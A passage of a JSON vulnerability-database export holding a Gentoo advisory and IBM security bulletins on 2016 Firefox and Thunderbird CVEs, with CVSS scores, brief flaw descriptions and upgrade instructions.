8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1521", "CVE-2016-1522", "CVE-2016-1523", "CVE-2016-1526", "CVE-2016-9079"], "modified": "2017-01-13T00:00:00", "id": "GLSA-201701-35", "href": "https://security.gentoo.org/glsa/201701-35", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-17T19:07:07", "description": "### Background\n\nMozilla Firefox is a cross-platform web browser from Mozilla. The Mozilla Thunderbird mail client is a redesign of the Mozilla Mail component. The goal is to produce a cross-platform stand-alone mail application using XUL (XML User Interface Language). \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox and Thunderbird. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition via multiple vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-45.6.0\"\n \n\nAll Firefox-bin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-45.6.0\"\n \n\nAll Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-45.6.0\"\n \n\nAll Thunderbird-bin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-45.6.0\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-03T00:00:00", "type": "gentoo", "title": "Mozilla Firefox, Thunderbird: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2804", "CVE-2016-2805", "CVE-2016-2806", "CVE-2016-2807", "CVE-2016-2808", "CVE-2016-2809", "CVE-2016-2810", "CVE-2016-2811", "CVE-2016-2812", "CVE-2016-2813", "CVE-2016-2814", "CVE-2016-2816", "CVE-2016-2817", "CVE-2016-2820", "CVE-2016-2827", "CVE-2016-2830", "CVE-2016-2835", "CVE-2016-2836", "CVE-2016-2837", "CVE-2016-2838", "CVE-2016-2839", "CVE-2016-5250", "CVE-2016-5251", "CVE-2016-5252", "CVE-2016-5253", "CVE-2016-5254", "CVE-2016-5255", "CVE-2016-5256", "CVE-2016-5257", "CVE-2016-5258", "CVE-2016-5259", "CVE-2016-5260", "CVE-2016-5261", "CVE-2016-5262", "CVE-2016-5263", "CVE-2016-5264", "CVE-2016-5265", "CVE-2016-5266", "CVE-2016-5267", "CVE-2016-5268", "CVE-2016-5270", "CVE-2016-5271", "CVE-2016-5272", "CVE-2016-5273", "CVE-2016-5274", "CVE-2016-5275", "CVE-2016-5276", "CVE-2016-5277", "CVE-2016-5278", "CVE-2016-5279", "CVE-2016-5280", "CVE-2016-5281", "CVE-2016-5282", "CVE-2016-5283", "CVE-2016-5284", "CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5293", "CVE-2016-5294", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079", "CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904", "CVE-2016-9905"], "modified": "2017-01-04T00:00:00", "id": "GLSA-201701-15", "href": "https://security.gentoo.org/glsa/201701-15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-02-13T09:36:12", "description": "## Summary\n\nThere are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.5.0.0 to 1.5.2.5 of IBM SONAS\n\n## Vulnerability Details\n\nIBM SONAS is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla Firefox shipped in certain versions of IBM SONAS. These vulnerabilities concern the potential ability of a remote attacker to execute arbitrary code on a vulnerable system or cause a denial of service. \n \n**CVEID:** [_CVE-2016-5290_](<https://vulners.com/cve/CVE-2016-5290>) \n**DESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118920_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118920>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-5296_](<https://vulners.com/cve/CVE-2016-5296>)** \nDESCRIPTION:** Mozilla Firefox is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by Cairo when processing SVG content caused by compiler optimization. By persuading a victim to visit a specially-crafted Web site, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118921_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118921>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n \n \n**CVEID:** [_CVE-2016-9079_](<https://vulners.com/cve/CVE-2016-9079>)** \nDESCRIPTION:** Mozilla Firefox and Thunderbird could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free in SVG Animation. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119293_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119293>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-9895_](<https://vulners.com/cve/CVE-2016-9895>)** \nDESCRIPTION:** Mozilla Firefox allow a remote attacker to bypass cross-domain security restrictions. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to bypass inline JavaScript Content Security Policy (CSP) and cause event handlers on marquee elements to be executed. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119744_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119744>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n\n**CVEID:** [_CVE-2016-9893_](<https://vulners.com/cve/CVE-2016-9893>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119739_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119739>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9897_](<https://vulners.com/cve/CVE-2016-9897>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error in libGLES. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119746_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119746>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9898_](<https://vulners.com/cve/CVE-2016-9898>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free while manipulating DOM subtrees in the Editor. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119747_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119747>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9899_](<https://vulners.com/cve/CVE-2016-9899>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free while manipulating DOM events and removing audio elements. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119743_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119743>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9900_](<https://vulners.com/cve/CVE-2016-9900>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to bypass security restrictions. By persuading a victim to open a specially-crafted SVG image, a remote attacker could exploit this vulnerability using data: URLs to gain access to restricted external resources. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119748_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119748>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-9901_](<https://vulners.com/cve/CVE-2016-9901>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Pocket server. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary JavaScript in the about:pocket-saved page and access the Pocket messaging API. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119750_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119750>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9902_](<https://vulners.com/cve/CVE-2016-9902>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary commands on the system, caused by an error in the Pocket toolbar. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to inject content and commands into the Pocket context. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119751_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119751>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9904_](<https://vulners.com/cve/CVE-2016-9904>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to obtain sensitive information. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using a JavaScript Map/Set timing attack to determine whether an atom is used by another compartment and obtain sensitive information. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119749_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119749>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM SONAS \nThe product is affected when running code releases 1.5.0.0 to 1.5.2.5\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.5.2.6 of IBM SONAS. Customers running an affected version of IBM SONAS should upgrade to 1.5.2.6 or a later version, so that the fix gets applied. \n\n \nPlease contact [IBM support](<https://www-947.ibm.com/support/entry/portal/product/system_storage/network_attached_storage_%28nas%29/sonas/scale_out_network_attached_storage?productContext=-267772237>) for assistance in upgrading your system. \n\n## Workarounds and Mitigations\n\nWorkaround(s) : \nNormal operation of IBM SONAS does not require or call for customers to use Firefox to access the Internet. Although IBM recommends that you install a level of IBM SONAS code with a fix, you can avoid these vulnerabilities by not using Mozilla Firefox within your IBM SONAS system to access the Internet. \n \nMitigation: None\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:32:15", "type": "ibm", "title": "Security Bulletin: Mozilla Firefox vulnerability issues in IBM SONAS", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904"], "modified": "2018-06-18T00:32:15", "id": "921DFDB03FD53AE441193B49E1E79D7A01B14E10BC6418004E92AF484A8DC73E", "href": "https://www.ibm.com/support/pages/node/696931", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T09:36:14", "description": "## Summary\n\nThere are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.5.1.0 to 1.5.2.5 of IBM Storwize V7000 Unified.\n\n## Vulnerability Details\n\nIBM Storwize V7000 Unified is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla Firefox shipped in certain versions of IBM Storwize V7000 Unified. These vulnerabilities concern the potential ability of a remote attacker to execute arbitrary code on a vulnerable system or cause a denial of service. \n \n**CVEID:** [_CVE-2016-5290_](<https://vulners.com/cve/CVE-2016-5290>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118920_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118920>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-5296_](<https://vulners.com/cve/CVE-2016-5296>)** \nDESCRIPTION:** Mozilla Firefox is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by Cairo when processing SVG content caused by compiler optimization. By persuading a victim to visit a specially-crafted Web site, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118921_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118921>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n \n**CVEID:** [_CVE-2016-9079_](<https://vulners.com/cve/CVE-2016-9079>)** \nDESCRIPTION:** Mozilla Firefox and Thunderbird could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free in SVG Animation. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119293_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119293>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-9898_](<https://vulners.com/cve/CVE-2016-9898>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free while manipulating DOM subtrees in the Editor. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119747_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119747>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-9893_](<https://vulners.com/cve/CVE-2016-9893>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119739_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119739>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9895_](<https://vulners.com/cve/CVE-2016-9895>)** \nDESCRIPTION:** Mozilla Firefox allow a remote attacker to bypass cross-domain security restrictions. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to bypass inline JavaScript Content Security Policy (CSP) and cause event handlers on marquee elements to be executed. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119744_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119744>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n**CVEID:** [_CVE-2016-9897_](<https://vulners.com/cve/CVE-2016-9897>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error in libGLES. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119746_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119746>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9899_](<https://vulners.com/cve/CVE-2016-9899>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free while manipulating DOM events and removing audio elements. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119743_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119743>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9900_](<https://vulners.com/cve/CVE-2016-9900>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to bypass security restrictions. By persuading a victim to open a specially-crafted SVG image, a remote attacker could exploit this vulnerability using data: URLs to gain access to restricted external resources. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119748_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119748>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-9901_](<https://vulners.com/cve/CVE-2016-9901>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Pocket server. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary JavaScript in the about:pocket-saved page and access the Pocket messaging API. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119750_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119750>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9902_](<https://vulners.com/cve/CVE-2016-9902>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary commands on the system, caused by an error in the Pocket toolbar. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to inject content and commands into the Pocket context. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119751_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119751>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9904_](<https://vulners.com/cve/CVE-2016-9904>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to obtain sensitive information. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using a JavaScript Map/Set timing attack to determine whether an atom is used by another compartment and obtain sensitive information. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119749_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119749>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\n \n \n**CVEID:** [_CVE-2016-5291_](<https://vulners.com/cve/CVE-2016-5291>)** \nDESCRIPTION:** Mozilla Firefox could allow a local attacker to bypass security restrictions. An attacker could exploit this vulnerability using local shortcut files to load arbitrary local content from disk and bypass same-origin policy. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118934_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118934>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n\n**CVEID:** [_CVE-2016-9064_](<https://vulners.com/cve/CVE-2016-9064>)** \nDESCRIPTION:** Mozilla Firefox is vulnerable to a man-in-the-middle attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using a signed add-on to bypass certificate pinning protection and conduct a man-in-the-middle attack between the user and the add-on update server. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118926_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118926>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n**CVEID:** [_CVE-2016-9066_](<https://vulners.com/cve/CVE-2016-9066>)** \nDESCRIPTION:** Mozilla Firefox is vulnerable to a buffer overflow, caused by an integer overflow in nsScriptLoadHandler. By persuading a victim to visit a specially-crafted Web site, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118928_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118928>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-5297_](<https://vulners.com/cve/CVE-2016-5297>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by an argument length checking error may occur in JavaScript. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to trigger an integer overflow and execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/118925_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118925>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.1.0 to 1.5.2.5\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.5.2.6 of IBM Storwize V7000 Unified. Customers running an affected version of IBM Storwize V7000 Unified should upgrade to 1.5.2.6 or a later version, so that the fix gets applied. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>)\n\n## Workarounds and Mitigations\n\n**Workaround(s)** : \nNormal operation of IBM Storwize V7000 Unified does not require or call for customer to use Firefox to access the Internet. Although IBM recommends that you install a level of IBM Storwize V7000 Unified code with a fix, you can avoid these vulnerabilities by not using Mozilla Firefox within your IBM Storwize V7000 Unified system to access the Internet. \n \n**Mitigation**: None\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:32:14", "type": "ibm", "title": "Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-9066", "CVE-2016-9079", 